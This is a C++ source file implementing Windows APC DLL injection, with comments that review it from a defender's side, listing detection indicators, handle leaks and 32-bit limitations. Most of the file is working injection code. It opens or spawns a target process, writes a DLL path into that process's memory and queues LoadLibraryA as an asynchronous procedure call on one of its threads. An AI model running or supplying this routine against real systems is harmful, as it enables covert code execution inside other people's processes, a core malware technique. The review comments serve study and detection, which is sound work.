#include  // header name lost in extraction: the Win32 calls below (OpenProcess, VirtualAllocEx, ...) need <windows.h>
#include  // header name lost in extraction: THREADENTRY32 / Thread32First need <tlhelp32.h>
#include  // header name lost in extraction: cout / endl need <iostream>

using namespace std;

/*
 * Conditions for APC injection:
 *   The target thread must be in an alertable wait state.
 *   It is alertable while inside APIs such as
 *   SleepEx, SignalObjectAndWait, WaitForSingleObjectEx, WaitForMultipleObjectsEx, MsgWaitForMultipleObjectsEx
 *   dwPid defaults to 0, which means a target process is created automatically and the
 *   injection takes effect immediately; otherwise an existing target is injected and the
 *   APC callback runs once the target thread becomes alertable.
 *
 * Review notes (reading the routine from the defender's side):
 *   - The cross-process call chain is OpenProcess(PROCESS_ALL_ACCESS) -> OpenThread(THREAD_ALL_ACCESS)
 *     -> VirtualAllocEx -> WriteProcessMemory -> QueueUserAPC(LoadLibraryA). Each step is a
 *     handle or memory operation against another process, i.e. exactly the kind of event
 *     endpoint monitoring is usually built around; the DLL path is written into the target
 *     as a plain ANSI string and stays there (it is never freed), so it is also a memory indicator.
 *   - exeUrl is declared but never read: the dwPid == 0 branch always launches a hard-coded path.
 *   - Several early `return FALSE` paths and the dwPid != 0 success path leave hPro and/or hThr
 *     open (see the per-line notes in the body).
 *
 * @param dllUrl  ANSI path of the DLL whose name is written into the target and passed to LoadLibraryA.
 * @param dwPid   0 = create the (hard-coded) target process suspended; otherwise PID of an existing process.
 * @param exeUrl  unused.
 * @return TRUE when QueueUserAPC succeeded, FALSE on any earlier failure.
 */
BOOL APCInject(char *dllUrl,DWORD dwPid=0,char *exeUrl=NULL);

int main(void)
{
    // Hard-coded DLL path and PID 3980; the BOOL result is printed as 0/1.
    cout << APCInject("c:\\desktop\\test.dll",3980) << endl;
    return 0;
}

BOOL APCInject(char *dllUrl,DWORD dwPid,char *exeUrl)
{
    HANDLE hSnap=NULL,hPro=NULL,hThr=NULL;   // snapshot, target process, target thread
    BOOL bOk = FALSE;                         // Thread32First/Next result
    LPVOID hVir = NULL;                       // remote buffer holding the DLL path (never freed)
    THREADENTRY32 te = { 0};

    if (!dwPid)
    {
        STARTUPINFO wi = { 0};
        PROCESS_INFORMATION pi = { 0};

        wi.cb = sizeof(wi);
        // Return value is not checked and exeUrl is ignored; because pi is zero-initialised a
        // failed CreateProcessA only surfaces later as `!hThr`. CREATE_SUSPENDED: the primary
        // thread has not started yet when the APC is queued below.
        CreateProcessA("c:\\desktop\\123.exe",NULL,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&wi,&pi);
        hPro = pi.hProcess;
        hThr = pi.hThread;
    } else {
        te.dwSize = sizeof(te);
        // PROCESS_ALL_ACCESS is broader than what the calls below actually use.
        hPro = OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwPid);
        if (!hPro)
            return FALSE;
        // 4 == TH32CS_SNAPTHREAD. A thread snapshot covers every thread on the system, which is
        // why the loop filters on th32OwnerProcessID. hSnap is not checked against
        // INVALID_HANDLE_VALUE; on failure Thread32First simply returns FALSE and the loop is skipped.
        hSnap = CreateToolhelp32Snapshot(4,dwPid);
        bOk = Thread32First(hSnap,&te);
        while (bOk)
        {
            if (te.th32OwnerProcessID == dwPid)
            {
                // First thread of the PID in snapshot order is taken; there is no check that
                // this particular thread is (or will become) alertable.
                hThr = OpenThread(THREAD_ALL_ACCESS,FALSE,te.th32ThreadID);
                break;
            }

            bOk = Thread32Next(hSnap,&te);
        }
        CloseHandle(hSnap);
    }

    if (!hThr)
        return FALSE;                         // hPro leaks here (both branches)
    // Buffer sized for the path plus its terminator; hVir is never released with VirtualFreeEx.
    hVir = VirtualAllocEx(hPro,NULL,strlen(dllUrl)+1,MEM_COMMIT,PAGE_READWRITE);
    if (!hVir)
        return FALSE;                         // hPro and hThr leak here
    if (!WriteProcessMemory(hPro,hVir,dllUrl,strlen(dllUrl)+1,NULL))
        return FALSE;                         // hPro and hThr leak here (remote buffer stays allocated)
    CloseHandle(hPro);                        // process handle no longer needed from this point on
    // The APC routine is the local address of kernel32!LoadLibraryA, so this relies on kernel32
    // being mapped at the same address in the target. GetProcAddress is not checked for NULL.
    // (DWORD)hVir narrows the pointer to 32 bits; this matches a 32-bit build only.
    if (QueueUserAPC((PAPCFUNC)GetProcAddress(GetModuleHandle("kernel32.dll"),"LoadLibraryA"),hThr,(DWORD)hVir))
    {
        if (!dwPid)
        {
            ResumeThread(hThr);               // start the suspended primary thread
            CloseHandle(hThr);
        }
        // NOTE(review): when dwPid != 0, hThr is not closed on this success path.
        return TRUE;
    }
    CloseHandle(hThr);
    return FALSE;
}